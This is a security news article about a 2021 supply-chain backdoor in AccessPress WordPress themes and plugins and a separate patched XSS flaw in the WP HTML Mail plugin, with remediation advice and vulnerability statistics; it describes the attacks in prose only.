Secret Backdoors Discovered In WordPress Plugins and Themes

In another software supply chain attack, dozens of WordPress themes and plugins hosted on a developer’s website were backdoored with malicious code in September 2021 with the goal of infecting further sites.

This gave attackers full administrative control over websites that used 40 themes and 53 plugins belonging to AccessPress Themes, a Nepal-based company that boasts of no fewer than 360,000 active website installations.

Security researchers from JetPack have stated that the infected extensions contained a dropper for a web shell that gives attackers full access to the infected sites, this same extensions were fine if downloaded or installed directly from the WordPress[.]org directory.

The vulnerability has been assigned with the identifier CVE-2021-24867. Sucuri the web security platform in a separate analysis said some of the infected websites found utilizing this backdoor had spam payloads dating back almost three years, implying that the actors behind the operations were selling access to the sites to operators of other spam campaigns.

The cybersecurity firm eSentire earlier this month disclosed how compromised WordPress websites belonging to legitimate business are used as a hotbed for malware delivery, serving unsuspecting users searching for intellectual property agreements on search engines like Google with an implant called GootLoader.


For website owners with installed plugins from AccessPress Themes’ website, its advisable they upgrade immediately to a safe version or replace it with the latest version from WordPress directly. Also it necessitates that a clean version of WordPress is deployed to revert the modifications done during the installation of the backdoor.

This findings also come as WordPress security company Wordfence disclosed details of a now-patched cross-site (XSS) vulnerability impacting a plugin called “WordPress Email Template Designer – WP HTML Mail” that’s installed on over 20,000 websites.

With a rating of 8.3 on the CVSS vulnerability scoring system and tracked as CVE-2022-0218 and has been addressed as part of updates released on January 13, 2022 (version 3.1).

This flaw makes it possible for an unauthenticated attacker to inject malicious JavaScript that would execute whenever a site administrator accessed the template editor and would also allow them to modify the email template to contain arbitrary data that could be used ton perform a phishing attack against anyone who received emails from the compromised site.

Statistics state that 2,240 security flaws were discovered and reported in third-party WordPress plugins towards the end of 2021, up 142% from 2020 when nearly 1,000 vulnerabilities were disclosed. With a total of 10,359 WordPress plugin vulnerabilities haven been uncovered.

Leave a Comment

Your email address will not be published. Required fields are marked *